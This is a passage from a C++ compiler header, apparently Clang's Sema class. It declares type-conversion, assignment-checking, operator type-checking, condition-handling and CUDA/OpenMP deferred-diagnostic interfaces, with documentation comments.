// functions and arrays to their respective pointers (C99 6.3.2.1).
ExprResult UsualUnaryConversions(Expr *E);
/// CallExprUnaryConversions - a special case of a unary conversion
/// performed on a function designator of a call expression.
ExprResult CallExprUnaryConversions(Expr *E);
// DefaultFunctionArrayConversion - converts functions and arrays
// to their respective pointers (C99 6.3.2.1).
ExprResult DefaultFunctionArrayConversion(Expr *E, bool Diagnose = true);
// DefaultFunctionArrayLvalueConversion - converts functions and
// arrays to their respective pointers and performs the
// lvalue-to-rvalue conversion.
ExprResult DefaultFunctionArrayLvalueConversion(Expr *E,
bool Diagnose = true);
// DefaultLvalueConversion - performs lvalue-to-rvalue conversion on
// the operand. This function is a no-op if the operand has a function type
// or an array type.
ExprResult DefaultLvalueConversion(Expr *E);
// DefaultArgumentPromotion (C99 6.5.2.2p6). Used for function calls that
// do not have a prototype. Integer promotions are performed on each
// argument, and arguments that have type float are promoted to double.
ExprResult DefaultArgumentPromotion(Expr *E);
/// If \p E is a prvalue denoting an unmaterialized temporary, materialize
/// it as an xvalue. In C++98, the result will still be a prvalue, because
/// we don't have xvalues there.
ExprResult TemporaryMaterializationConversion(Expr *E);
// Used for emitting the right warning by DefaultVariadicArgumentPromotion
enum VariadicCallType {
VariadicFunction,
VariadicBlock,
VariadicMethod,
VariadicConstructor,
VariadicDoesNotApply
};
VariadicCallType getVariadicCallType(FunctionDecl *FDecl,
const FunctionProtoType *Proto,
Expr *Fn);
// Used for determining in which context a type is allowed to be passed to a
// vararg function.
enum VarArgKind {
VAK_Valid,
VAK_ValidInCXX11,
VAK_Undefined,
VAK_MSVCUndefined,
VAK_Invalid
};
// Determines which VarArgKind fits an expression.
VarArgKind isValidVarArgType(const QualType &Ty);
/// Check to see if the given expression is a valid argument to a variadic
/// function, issuing a diagnostic if not.
void checkVariadicArgument(const Expr *E, VariadicCallType CT);
/// Check to see if a given expression could have '.c_str()' called on it.
bool hasCStrMethod(const Expr *E);
/// GatherArgumentsForCall - Collects argument expressions for various
/// forms of call prototypes.
bool GatherArgumentsForCall(SourceLocation CallLoc, FunctionDecl *FDecl,
const FunctionProtoType *Proto,
unsigned FirstParam, ArrayRef<Expr *> Args,
SmallVectorImpl<Expr *> &AllArgs,
VariadicCallType CallType = VariadicDoesNotApply,
bool AllowExplicit = false,
bool IsListInitialization = false);
// DefaultVariadicArgumentPromotion - Like DefaultArgumentPromotion, but
// will create a runtime trap if the resulting type is not a POD type.
ExprResult DefaultVariadicArgumentPromotion(Expr *E, VariadicCallType CT,
FunctionDecl *FDecl);
/// Context in which we're performing a usual arithmetic conversion.
enum ArithConvKind {
/// An arithmetic operation.
ACK_Arithmetic,
/// A bitwise operation.
ACK_BitwiseOp,
/// A comparison.
ACK_Comparison,
/// A conditional (?:) operator.
ACK_Conditional,
/// A compound assignment expression.
ACK_CompAssign,
};
// UsualArithmeticConversions - performs the UsualUnaryConversions on its
// operands and then handles various conversions that are common to binary
// operators (C99 6.3.1.8). If either operand is not arithmetic, this
// routine returns the first non-arithmetic type found. The client is
// responsible for emitting appropriate error diagnostics.
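// Illustrative outcome (a sketch): for 'int i; double d;', the operands of
// 'i + d' are both converted to double, and Context.DoubleTy is returned.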
QualType UsualArithmeticConversions(ExprResult &LHS, ExprResult &RHS,
SourceLocation Loc, ArithConvKind ACK);
/// AssignConvertType - All of the 'assignment' semantic checks return this
/// enum to indicate whether the assignment was allowed. These checks are
/// done for simple assignments, as well as initialization, return from
/// function, argument passing, etc. The query is phrased in terms of a
/// source and destination type.
enum AssignConvertType {
/// Compatible - the types are compatible according to the standard.
Compatible,
/// PointerToInt - The assignment converts a pointer to an int, which we
/// accept as an extension.
PointerToInt,
/// IntToPointer - The assignment converts an int to a pointer, which we
/// accept as an extension.
IntToPointer,
/// FunctionVoidPointer - The assignment is between a function pointer and
/// void*, which the standard doesn't allow, but we accept as an extension.
FunctionVoidPointer,
/// IncompatiblePointer - The assignment is between two pointer types that
/// are not compatible, but we accept them as an extension.
IncompatiblePointer,
/// IncompatibleFunctionPointer - The assignment is between two function
/// pointer types that are not compatible, but we accept them as an
/// extension.
IncompatibleFunctionPointer,
/// IncompatiblePointerSign - The assignment is between two pointer types
/// that point to integers of different sign but are otherwise identical.
/// This is a subset of the above, but broken out because it's by far the
/// most common case of incompatible pointers.
IncompatiblePointerSign,
/// CompatiblePointerDiscardsQualifiers - The assignment discards
/// c/v/r qualifiers, which we accept as an extension.
CompatiblePointerDiscardsQualifiers,
/// IncompatiblePointerDiscardsQualifiers - The assignment
/// discards qualifiers that we don't permit to be discarded,
/// like address spaces.
IncompatiblePointerDiscardsQualifiers,
/// IncompatibleNestedPointerAddressSpaceMismatch - The assignment
/// changes address spaces in nested pointer types which is not allowed.
/// For instance, converting __private int ** to __generic int ** is
/// illegal even though __private could be converted to __generic.
IncompatibleNestedPointerAddressSpaceMismatch,
/// IncompatibleNestedPointerQualifiers - The assignment is between two
/// nested pointer types, and the qualifiers other than the first two
/// levels differ e.g. char ** -> const char **, but we accept them as an
/// extension.
IncompatibleNestedPointerQualifiers,
/// IncompatibleVectors - The assignment is between two vector types that
/// have the same size, which we accept as an extension.
IncompatibleVectors,
/// IntToBlockPointer - The assignment converts an int to a block
/// pointer. We disallow this.
IntToBlockPointer,
/// IncompatibleBlockPointer - The assignment is between two block
/// pointer types that are not compatible.
IncompatibleBlockPointer,
/// IncompatibleObjCQualifiedId - The assignment is between a qualified
/// id type and something else (that is incompatible with it). For example,
/// "id <XXX>" = "Foo *", where "Foo *" doesn't implement the XXX protocol.
IncompatibleObjCQualifiedId,
/// IncompatibleObjCWeakRef - Assigning a weak-unavailable object to an
/// object with __weak qualifier.
IncompatibleObjCWeakRef,
/// Incompatible - We reject this conversion outright, it is invalid to
/// represent it in the AST.
Incompatible
};
/// DiagnoseAssignmentResult - Emit a diagnostic, if required, for the
/// assignment conversion type specified by ConvTy. This returns true if the
/// conversion was invalid or false if the conversion was accepted.
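/// Typical pairing with the assignment checks (an illustrative sketch;
/// 'LHSTy' and 'RHS' are placeholders):
///
///  AssignConvertType ConvTy = CheckSingleAssignmentConstraints(LHSTy, RHS);
///  if (DiagnoseAssignmentResult(ConvTy, Loc, LHSTy, RHS.get()->getType(),
///                               RHS.get(), AA_Assigning))
///    return ExprError();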
bool DiagnoseAssignmentResult(AssignConvertType ConvTy,
SourceLocation Loc,
QualType DstType, QualType SrcType,
Expr *SrcExpr, AssignmentAction Action,
bool *Complained = nullptr);
/// IsValueInFlagEnum - Determine if a value is allowed as part of a flag
/// enum. If AllowMask is true, then we also allow the complement of a valid
/// value, to be used as a mask.
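/// Worked example (illustrative): for 'enum Flags { A = 0x1, B = 0x2,
/// C = 0x4 }', the value 0x5 (A|C) is allowed and 0x8 is not; with
/// AllowMask, ~0x5 is also accepted as a mask of valid bits.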
bool IsValueInFlagEnum(const EnumDecl *ED, const llvm::APInt &Val,
bool AllowMask) const;
/// DiagnoseAssignmentEnum - Warn if assignment to enum is a constant
/// integer not in the range of enum values.
void DiagnoseAssignmentEnum(QualType DstType, QualType SrcType,
Expr *SrcExpr);
/// CheckAssignmentConstraints - Perform type checking for assignment,
/// argument passing, variable initialization, and function return values.
/// C99 6.5.16.
AssignConvertType CheckAssignmentConstraints(SourceLocation Loc,
QualType LHSType,
QualType RHSType);
/// Check assignment constraints and optionally prepare for a conversion of
/// the RHS to the LHS type. The conversion is prepared for if ConvertRHS
/// is true.
AssignConvertType CheckAssignmentConstraints(QualType LHSType,
ExprResult &RHS,
CastKind &Kind,
bool ConvertRHS = true);
/// Check assignment constraints for an assignment of RHS to LHSType.
///
/// \param LHSType The destination type for the assignment.
/// \param RHS The source expression for the assignment.
/// \param Diagnose If \c true, diagnostics may be produced when checking
/// for assignability. If a diagnostic is produced, \p RHS will be
/// set to ExprError(). Note that this function may still return
/// without producing a diagnostic, even for an invalid assignment.
/// \param DiagnoseCFAudited If \c true, the target is a function parameter
/// in an audited Core Foundation API and does not need to be checked
/// for ARC retain issues.
/// \param ConvertRHS If \c true, \p RHS will be updated to model the
/// conversions necessary to perform the assignment. If \c false,
/// \p Diagnose must also be \c false.
AssignConvertType CheckSingleAssignmentConstraints(
QualType LHSType, ExprResult &RHS, bool Diagnose = true,
bool DiagnoseCFAudited = false, bool ConvertRHS = true);
// If the lhs type is a transparent union, check whether we
// can initialize the transparent union with the given expression.
AssignConvertType CheckTransparentUnionArgumentConstraints(QualType ArgType,
ExprResult &RHS);
bool IsStringLiteralToNonConstPointerConversion(Expr *From, QualType ToType);
bool CheckExceptionSpecCompatibility(Expr *From, QualType ToType);
ExprResult PerformImplicitConversion(Expr *From, QualType ToType,
AssignmentAction Action,
bool AllowExplicit = false);
ExprResult PerformImplicitConversion(Expr *From, QualType ToType,
AssignmentAction Action,
bool AllowExplicit,
ImplicitConversionSequence& ICS);
ExprResult PerformImplicitConversion(Expr *From, QualType ToType,
const ImplicitConversionSequence& ICS,
AssignmentAction Action,
CheckedConversionKind CCK
= CCK_ImplicitConversion);
ExprResult PerformImplicitConversion(Expr *From, QualType ToType,
const StandardConversionSequence& SCS,
AssignmentAction Action,
CheckedConversionKind CCK);
ExprResult PerformQualificationConversion(
Expr *E, QualType Ty, ExprValueKind VK = VK_RValue,
CheckedConversionKind CCK = CCK_ImplicitConversion);
/// The following "Check" methods will return a valid/converted QualType
/// or a null QualType (indicating an error diagnostic was issued).
/// Type checking binary operators (subroutines of CreateBuiltinBinOp).
QualType InvalidOperands(SourceLocation Loc, ExprResult &LHS,
ExprResult &RHS);
QualType InvalidLogicalVectorOperands(SourceLocation Loc, ExprResult &LHS,
ExprResult &RHS);
QualType CheckPointerToMemberOperands( // C++ 5.5
ExprResult &LHS, ExprResult &RHS, ExprValueKind &VK,
SourceLocation OpLoc, bool isIndirect);
QualType CheckMultiplyDivideOperands( // C99 6.5.5
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc, bool IsCompAssign,
bool IsDivide);
QualType CheckRemainderOperands( // C99 6.5.5
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
bool IsCompAssign = false);
QualType CheckAdditionOperands( // C99 6.5.6
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc, QualType* CompLHSTy = nullptr);
QualType CheckSubtractionOperands( // C99 6.5.6
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
QualType* CompLHSTy = nullptr);
QualType CheckShiftOperands( // C99 6.5.7
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc, bool IsCompAssign = false);
void CheckPtrComparisonWithNullChar(ExprResult &E, ExprResult &NullE);
QualType CheckCompareOperands( // C99 6.5.8/9
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc);
QualType CheckBitwiseOperands( // C99 6.5.[10...12]
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc);
QualType CheckLogicalOperands( // C99 6.5.[13,14]
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc);
// CheckAssignmentOperands is used for both simple and compound assignment.
// For simple assignment, pass both expressions and a null converted type.
// For compound assignment, pass both expressions and the converted type.
QualType CheckAssignmentOperands( // C99 6.5.16.[1,2]
Expr *LHSExpr, ExprResult &RHS, SourceLocation Loc, QualType CompoundType);
ExprResult checkPseudoObjectIncDec(Scope *S, SourceLocation OpLoc,
UnaryOperatorKind Opcode, Expr *Op);
ExprResult checkPseudoObjectAssignment(Scope *S, SourceLocation OpLoc,
BinaryOperatorKind Opcode,
Expr *LHS, Expr *RHS);
ExprResult checkPseudoObjectRValue(Expr *E);
Expr *recreateSyntacticForm(PseudoObjectExpr *E);
QualType CheckConditionalOperands( // C99 6.5.15
ExprResult &Cond, ExprResult &LHS, ExprResult &RHS,
ExprValueKind &VK, ExprObjectKind &OK, SourceLocation QuestionLoc);
QualType CXXCheckConditionalOperands( // C++ 5.16
ExprResult &cond, ExprResult &lhs, ExprResult &rhs,
ExprValueKind &VK, ExprObjectKind &OK, SourceLocation questionLoc);
QualType CheckGNUVectorConditionalTypes(ExprResult &Cond, ExprResult &LHS,
ExprResult &RHS,
SourceLocation QuestionLoc);
QualType FindCompositePointerType(SourceLocation Loc, Expr *&E1, Expr *&E2,
bool ConvertArgs = true);
QualType FindCompositePointerType(SourceLocation Loc,
ExprResult &E1, ExprResult &E2,
bool ConvertArgs = true) {
Expr *E1Tmp = E1.get(), *E2Tmp = E2.get();
QualType Composite =
FindCompositePointerType(Loc, E1Tmp, E2Tmp, ConvertArgs);
E1 = E1Tmp;
E2 = E2Tmp;
return Composite;
}
QualType FindCompositeObjCPointerType(ExprResult &LHS, ExprResult &RHS,
SourceLocation QuestionLoc);
bool DiagnoseConditionalForNull(Expr *LHSExpr, Expr *RHSExpr,
SourceLocation QuestionLoc);
void DiagnoseAlwaysNonNullPointer(Expr *E,
Expr::NullPointerConstantKind NullType,
bool IsEqual, SourceRange Range);
/// type checking for vector binary operators.
QualType CheckVectorOperands(ExprResult &LHS, ExprResult &RHS,
SourceLocation Loc, bool IsCompAssign,
bool AllowBothBool, bool AllowBoolConversion);
QualType GetSignedVectorType(QualType V);
QualType CheckVectorCompareOperands(ExprResult &LHS, ExprResult &RHS,
SourceLocation Loc,
BinaryOperatorKind Opc);
QualType CheckVectorLogicalOperands(ExprResult &LHS, ExprResult &RHS,
SourceLocation Loc);
bool areLaxCompatibleVectorTypes(QualType srcType, QualType destType);
bool isLaxVectorConversion(QualType srcType, QualType destType);
/// type checking declaration initializers (C99 6.7.8)
bool CheckForConstantInitializer(Expr *e, QualType t);
// type checking C++ declaration initializers (C++ [dcl.init]).
/// ReferenceCompareResult - Expresses the result of comparing two
/// types (cv1 T1 and cv2 T2) to determine their compatibility for the
/// purposes of initialization by reference (C++ [dcl.init.ref]p4).
enum ReferenceCompareResult {
/// Ref_Incompatible - The two types are incompatible, so direct
/// reference binding is not possible.
Ref_Incompatible = 0,
/// Ref_Related - The two types are reference-related, which means
/// that their unqualified forms (T1 and T2) are either the same
/// or T1 is a base class of T2.
Ref_Related,
/// Ref_Compatible - The two types are reference-compatible.
Ref_Compatible
};
// Fake up a scoped enumeration that still contextually converts to bool.
struct ReferenceConversionsScope {
/// The conversions that would be performed on an lvalue of type T2 when
/// binding a reference of type T1 to it, as determined when evaluating
/// whether T1 is reference-compatible with T2.
enum ReferenceConversions {
Qualification = 0x1,
NestedQualification = 0x2,
Function = 0x4,
DerivedToBase = 0x8,
ObjC = 0x10,
ObjCLifetime = 0x20,
LLVM_MARK_AS_BITMASK_ENUM(/*LargestValue=*/ObjCLifetime)
};
};
using ReferenceConversions = ReferenceConversionsScope::ReferenceConversions;
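/// Illustrative outcome (a sketch): for 'const Base &r = derivedObj;',
/// comparing T1 = 'const Base' against T2 = 'Derived' yields Ref_Compatible,
/// with *Conv reporting the DerivedToBase and Qualification conversions.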
ReferenceCompareResult
CompareReferenceRelationship(SourceLocation Loc, QualType T1, QualType T2,
ReferenceConversions *Conv = nullptr);
ExprResult checkUnknownAnyCast(SourceRange TypeRange, QualType CastType,
Expr *CastExpr, CastKind &CastKind,
ExprValueKind &VK, CXXCastPath &Path);
/// Force an expression with unknown-type to an expression of the
/// given type.
ExprResult forceUnknownAnyToType(Expr *E, QualType ToType);
/// Type-check an expression that's being passed to an
/// __unknown_anytype parameter.
ExprResult checkUnknownAnyArg(SourceLocation callLoc,
Expr *result, QualType ¶mType);
// CheckVectorCast - check type constraints for vectors.
// Since vectors are an extension, there is no C standard reference for this.
// We allow casting between vectors and integer datatypes of the same size.
// Returns true if the cast is invalid.
bool CheckVectorCast(SourceRange R, QualType VectorTy, QualType Ty,
CastKind &Kind);
/// Prepare `SplattedExpr` for a vector splat operation, adding
/// implicit casts if necessary.
ExprResult prepareVectorSplat(QualType VectorTy, Expr *SplattedExpr);
// CheckExtVectorCast - check type constraints for extended vectors.
// Since vectors are an extension, there is no C standard reference for this.
// We allow casting between vectors and integer datatypes of the same size,
// or vectors and the element type of that vector.
// Returns the cast expr.
ExprResult CheckExtVectorCast(SourceRange R, QualType DestTy, Expr *CastExpr,
CastKind &Kind);
ExprResult BuildCXXFunctionalCastExpr(TypeSourceInfo *TInfo, QualType Type,
SourceLocation LParenLoc,
Expr *CastExpr,
SourceLocation RParenLoc);
enum ARCConversionResult { ACR_okay, ACR_unbridged, ACR_error };
/// Checks for invalid conversions and casts between
/// retainable pointers and other pointer kinds for ARC and Weak.
ARCConversionResult CheckObjCConversion(SourceRange castRange,
QualType castType, Expr *&op,
CheckedConversionKind CCK,
bool Diagnose = true,
bool DiagnoseCFAudited = false,
BinaryOperatorKind Opc = BO_PtrMemD
);
Expr *stripARCUnbridgedCast(Expr *e);
void diagnoseARCUnbridgedCast(Expr *e);
bool CheckObjCARCUnavailableWeakConversion(QualType castType,
QualType ExprType);
/// checkRetainCycles - Check whether an Objective-C message send
/// might create an obvious retain cycle.
void checkRetainCycles(ObjCMessageExpr *msg);
void checkRetainCycles(Expr *receiver, Expr *argument);
void checkRetainCycles(VarDecl *Var, Expr *Init);
/// checkUnsafeAssigns - Check whether +1 expr is being assigned
/// to weak/__unsafe_unretained type.
bool checkUnsafeAssigns(SourceLocation Loc, QualType LHS, Expr *RHS);
/// checkUnsafeExprAssigns - Check whether +1 expr is being assigned
/// to weak/__unsafe_unretained expression.
void checkUnsafeExprAssigns(SourceLocation Loc, Expr *LHS, Expr *RHS);
/// CheckMessageArgumentTypes - Check types in an Obj-C message send.
/// \param Method - May be null.
/// \param [out] ReturnType - The return type of the send.
/// \return true iff there were any incompatible types.
bool CheckMessageArgumentTypes(const Expr *Receiver, QualType ReceiverType,
MultiExprArg Args, Selector Sel,
ArrayRef<SourceLocation> SelectorLocs,
ObjCMethodDecl *Method, bool isClassMessage,
bool isSuperMessage, SourceLocation lbrac,
SourceLocation rbrac, SourceRange RecRange,
QualType &ReturnType, ExprValueKind &VK);
/// Determine the result of a message send expression based on
/// the type of the receiver, the method expected to receive the message,
/// and the form of the message send.
QualType getMessageSendResultType(const Expr *Receiver, QualType ReceiverType,
ObjCMethodDecl *Method, bool isClassMessage,
bool isSuperMessage);
/// If the given expression involves a message send to a method
/// with a related result type, emit a note describing what happened.
void EmitRelatedResultTypeNote(const Expr *E);
/// Given that we had incompatible pointer types in a return
/// statement, check whether we're in a method with a related result
/// type, and if so, emit a note describing what happened.
void EmitRelatedResultTypeNoteForReturn(QualType destType);
class ConditionResult {
Decl *ConditionVar;
FullExprArg Condition;
bool Invalid;
bool HasKnownValue;
bool KnownValue;
friend class Sema;
ConditionResult(Sema &S, Decl *ConditionVar, FullExprArg Condition,
bool IsConstexpr)
: ConditionVar(ConditionVar), Condition(Condition), Invalid(false),
HasKnownValue(IsConstexpr && Condition.get() &&
!Condition.get()->isValueDependent()),
KnownValue(HasKnownValue &&
!!Condition.get()->EvaluateKnownConstInt(S.Context)) {}
explicit ConditionResult(bool Invalid)
: ConditionVar(nullptr), Condition(nullptr), Invalid(Invalid),
HasKnownValue(false), KnownValue(false) {}
public:
ConditionResult() : ConditionResult(false) {}
bool isInvalid() const { return Invalid; }
std::pair<VarDecl *, Expr *> get() const {
return std::make_pair(cast_or_null<VarDecl>(ConditionVar),
Condition.get());
}
llvm::Optional<bool> getKnownValue() const {
if (!HasKnownValue)
return None;
return KnownValue;
}
};
static ConditionResult ConditionError() { return ConditionResult(true); }
enum class ConditionKind {
Boolean, ///< A boolean condition, from 'if', 'while', 'for', or 'do'.
ConstexprIf, ///< A constant boolean condition from 'if constexpr'.
Switch ///< An integral condition for a 'switch' statement.
};
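/// Illustrative use when checking an 'if' condition (a sketch; 'S', 'Loc',
/// and 'CondExpr' are placeholders):
///
///  ConditionResult Cond =
///      ActOnCondition(S, Loc, CondExpr, ConditionKind::Boolean);
///  if (Cond.isInvalid())
///    return StmtError();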
ConditionResult ActOnCondition(Scope *S, SourceLocation Loc,
Expr *SubExpr, ConditionKind CK);
ConditionResult ActOnConditionVariable(Decl *ConditionVar,
SourceLocation StmtLoc,
ConditionKind CK);
DeclResult ActOnCXXConditionDeclaration(Scope *S, Declarator &D);
ExprResult CheckConditionVariable(VarDecl *ConditionVar,
SourceLocation StmtLoc,
ConditionKind CK);
ExprResult CheckSwitchCondition(SourceLocation SwitchLoc, Expr *Cond);
/// CheckBooleanCondition - Diagnose problems involving the use of
/// the given expression as a boolean condition (e.g. in an if
/// statement). Also performs the standard function and array
/// decays, possibly changing the input variable.
///
/// \param Loc - A location associated with the condition, e.g. the
/// 'if' keyword.
/// \return the converted expression, or ExprError() if there were errors.
ExprResult CheckBooleanCondition(SourceLocation Loc, Expr *E,
bool IsConstexpr = false);
/// ActOnExplicitBoolSpecifier - Build an ExplicitSpecifier from an expression
/// found in an explicit(bool) specifier.
ExplicitSpecifier ActOnExplicitBoolSpecifier(Expr *E);
/// tryResolveExplicitSpecifier - Attempt to resolve the explicit specifier.
/// Returns true if the explicit specifier is now resolved.
bool tryResolveExplicitSpecifier(ExplicitSpecifier &ExplicitSpec);
/// DiagnoseAssignmentAsCondition - Given that an expression is
/// being used as a boolean condition, warn if it's an assignment.
void DiagnoseAssignmentAsCondition(Expr *E);
/// Redundant parentheses over an equality comparison can indicate
/// that the user intended an assignment used as condition.
void DiagnoseEqualityWithExtraParens(ParenExpr *ParenE);
/// CheckCXXBooleanCondition - Converts the expression to bool; yields
/// ExprError() if the conversion is invalid.
ExprResult CheckCXXBooleanCondition(Expr *CondExpr, bool IsConstexpr = false);
/// ConvertIntegerToTypeWarnOnOverflow - Convert the specified APInt to have
/// the specified width and sign. If an overflow occurs, detect it and emit
/// the specified diagnostic.
void ConvertIntegerToTypeWarnOnOverflow(llvm::APSInt &OldVal,
unsigned NewWidth, bool NewSign,
SourceLocation Loc, unsigned DiagID);
/// Checks that the Objective-C declaration is declared in the global scope.
/// Emits an error and marks the declaration as invalid if it's not declared
/// in the global scope.
bool CheckObjCDeclScope(Decl *D);
/// Abstract base class used for diagnosing integer constant
/// expression violations.
class VerifyICEDiagnoser {
public:
bool Suppress;
VerifyICEDiagnoser(bool Suppress = false) : Suppress(Suppress) { }
virtual void diagnoseNotICE(Sema &S, SourceLocation Loc, SourceRange SR) = 0;
virtual void diagnoseFold(Sema &S, SourceLocation Loc, SourceRange SR);
virtual ~VerifyICEDiagnoser() { }
};
/// VerifyIntegerConstantExpression - Verifies that an expression is an ICE,
/// and reports the appropriate diagnostics. Returns ExprError() on failure.
/// Can optionally return the value of the expression.
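/// Illustrative call (a sketch; 'E' is a placeholder expression):
///
///  llvm::APSInt Value;
///  if (VerifyIntegerConstantExpression(E, &Value).isInvalid())
///    return ExprError();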
ExprResult VerifyIntegerConstantExpression(Expr *E, llvm::APSInt *Result,
VerifyICEDiagnoser &Diagnoser,
bool AllowFold = true);
ExprResult VerifyIntegerConstantExpression(Expr *E, llvm::APSInt *Result,
unsigned DiagID,
bool AllowFold = true);
ExprResult VerifyIntegerConstantExpression(Expr *E,
llvm::APSInt *Result = nullptr);
/// VerifyBitField - Verifies that a bit-field expression is an ICE and has
/// the correct width, and that the field type is valid.
/// Returns ExprError() on failure.
/// Can optionally report (via \p ZeroWidth) whether the bit-field has width 0.
ExprResult VerifyBitField(SourceLocation FieldLoc, IdentifierInfo *FieldName,
QualType FieldTy, bool IsMsStruct,
Expr *BitWidth, bool *ZeroWidth = nullptr);
private:
unsigned ForceCUDAHostDeviceDepth = 0;
public:
/// Increments our count of the number of times we've seen a pragma forcing
/// functions to be __host__ __device__. So long as this count is greater
/// than zero, all functions encountered will be __host__ __device__.
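/// Illustrative source that drives this counter (a sketch):
///
///  #pragma clang force_cuda_host_device begin
///  void fn();  // treated as implicitly __host__ __device__
///  #pragma clang force_cuda_host_device end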
void PushForceCUDAHostDevice();
/// Decrements our count of the number of times we've seen a pragma forcing
/// functions to be __host__ __device__. Returns false if the count is 0
/// before decrementing, so you can emit an error.
bool PopForceCUDAHostDevice();
/// Diagnostics that are emitted only if we discover that the given function
/// must be codegen'ed. Because handling these correctly adds overhead to
/// compilation, this is currently only enabled for CUDA compilations.
llvm::DenseMap<CanonicalDeclPtr<FunctionDecl>,
std::vector<PartialDiagnosticAt>>
DeviceDeferredDiags;
/// A pair of a canonical FunctionDecl and a SourceLocation. When used as the
/// key in a hashtable, both the FD and location are hashed.
struct FunctionDeclAndLoc {
CanonicalDeclPtr<FunctionDecl> FD;
SourceLocation Loc;
};
/// FunctionDecls and SourceLocations for which CheckCUDACall has emitted a
/// (maybe deferred) "bad call" diagnostic. We use this to avoid emitting the
/// same deferred diag twice.
llvm::DenseSet<FunctionDeclAndLoc> LocsWithCUDACallDiags;
/// An inverse call graph, mapping known-emitted functions to one of their
/// known-emitted callers (plus the location of the call).
///
/// Functions that we can tell a priori must be emitted aren't added to this
/// map.
llvm::DenseMap</* Callee = */ CanonicalDeclPtr<FunctionDecl>,
/* Caller = */ FunctionDeclAndLoc>
DeviceKnownEmittedFns;
/// Diagnostic builder for CUDA/OpenMP device errors which may or may not be
/// deferred.
///
/// In CUDA, there exist constructs (e.g. variable-length arrays, try/catch)
/// which are not allowed to appear inside __device__ functions and are
/// allowed to appear in __host__ __device__ functions only if the host+device
/// function is never codegen'ed.
///
/// To handle this, we use the notion of "deferred diagnostics", where we
/// attach a diagnostic to a FunctionDecl that's emitted iff it's codegen'ed.
///
/// This class lets you emit either a regular diagnostic, a deferred
/// diagnostic, or no diagnostic at all, according to an argument you pass to
/// its constructor, thus simplifying the process of creating these "maybe
/// deferred" diagnostics.
class DeviceDiagBuilder {
public:
enum Kind {
/// Emit no diagnostics.
K_Nop,
/// Emit the diagnostic immediately (i.e., behave like Sema::Diag()).
K_Immediate,
/// Emit the diagnostic immediately, and, if it's a warning or error, also
/// emit a call stack showing how this function can be reached by an a
/// priori known-emitted function.
K_ImmediateWithCallStack,
/// Create a deferred diagnostic, which is emitted only if the function
/// it's attached to is codegen'ed. Also emit a call stack as with
/// K_ImmediateWithCallStack.
K_Deferred
};
DeviceDiagBuilder(Kind K, SourceLocation Loc, unsigned DiagID,
FunctionDecl *Fn, Sema &S);
DeviceDiagBuilder(DeviceDiagBuilder &&D);
DeviceDiagBuilder(const DeviceDiagBuilder &) = default;
~DeviceDiagBuilder();
/// Convertible to bool: True if we immediately emitted an error, false if
/// we didn't emit an error or we created a deferred error.
///
/// Example usage:
///
/// if (DeviceDiagBuilder(...) << foo << bar)
/// return ExprError();
///
/// But see CUDADiagIfDeviceCode() and CUDADiagIfHostCode() -- you probably
/// want to use these instead of creating a DeviceDiagBuilder yourself.
operator bool() const { return ImmediateDiag.hasValue(); }
template <typename T>
friend const DeviceDiagBuilder &operator<<(const DeviceDiagBuilder &Diag,
const T &Value) {
if (Diag.ImmediateDiag.hasValue())
*Diag.ImmediateDiag << Value;
else if (Diag.PartialDiagId.hasValue())
Diag.S.DeviceDeferredDiags[Diag.Fn][*Diag.PartialDiagId].second
<< Value;
return Diag;
}
private:
Sema &S;
SourceLocation Loc;
unsigned DiagID;
FunctionDecl *Fn;
bool ShowCallStack;
// Invariant: At most one of these Optionals has a value.
// FIXME: Switch these to a Variant once that exists.
llvm::Optional<SemaDiagnosticBuilder> ImmediateDiag;
llvm::Optional<unsigned> PartialDiagId;
};
/// Creates a DeviceDiagBuilder that emits the diagnostic if the current context
/// is "used as device code".
///
/// - If CurContext is a __host__ function, does not emit any diagnostics.
/// - If CurContext is a __device__ or __global__ function, emits the
/// diagnostics immediately.
/// - If CurContext is a __host__ __device__ function and we are compiling for
/// the device, creates a diagnostic which is emitted if and when we realize
/// that the function will be codegen'ed.
///
/// Example usage:
///
/// // Variable-length arrays are not allowed in CUDA device code.
/// if (CUDADiagIfDeviceCode(Loc, diag::err_cuda_vla) << CurrentCUDATarget())
/// return ExprError();
/// // Otherwise, continue parsing as normal.
DeviceDiagBuilder CUDADiagIfDeviceCode(SourceLocation Loc, unsigned DiagID);
/// Creates a DeviceDiagBuilder that emits the diagnostic if the current context
/// is "used as host code".
///
/// Same as CUDADiagIfDeviceCode, with "host" and "device" switched.
DeviceDiagBuilder CUDADiagIfHostCode(SourceLocation Loc, unsigned DiagID);
/// Creates a DeviceDiagBuilder that emits the diagnostic if the current
/// context is "used as device code".
///
/// - If CurContext is a `declare target` function or it is known that the
/// function is emitted for the device, emits the diagnostics immediately.
/// - If CurContext is a non-`declare target` function and we are compiling
/// for the device, creates a diagnostic which is emitted if and when we
/// realize that the function will be codegen'ed.
///
/// Example usage:
///
/// // Variable-length arrays are not allowed in NVPTX device code.
/// if (diagIfOpenMPDeviceCode(Loc, diag::err_vla_unsupported))
/// return ExprError();
/// // Otherwise, continue parsing as normal.
DeviceDiagBuilder diagIfOpenMPDeviceCode(SourceLocation Loc, unsigned DiagID);
/// Creates a DeviceDiagBuilder that emits the diagnostic if the current
/// context is "used as host code".
///
/// - If CurContext is a `declare target` function or it is known that the
/// function is emitted for the host, emits the diagnostics immediately.
/// - If CurContext is a non-host function, just ignore it.
///
/// Example usage:
///
/// // Variable-length arrays are not allowed in NVPTX device code.
/// if (diagIfOpenMPHostCode(Loc, diag::err_vla_unsupported))
/// return ExprError();
/// // Otherwise, continue parsing as normal.
DeviceDiagBuilder diagIfOpenMPHostCode(SourceLocation Loc, unsigned DiagID);
DeviceDiagBuilder targetDiag(SourceLocation Loc, unsigned DiagID);
enum CUDAFunctionTarget {
CFT_Device,
CFT_Global,
CFT_Host,
CFT_HostDevice,
CFT_InvalidTarget
};
/// Determines whether the given function is a CUDA device/host/kernel/etc.
/// function.
///
/// Use this rather than examining the function's attributes yourself -- you
/// will get it wrong. Returns CFT_Host if D is null.
CUDAFunctionTarget IdentifyCUDATarget(const FunctionDecl *D,
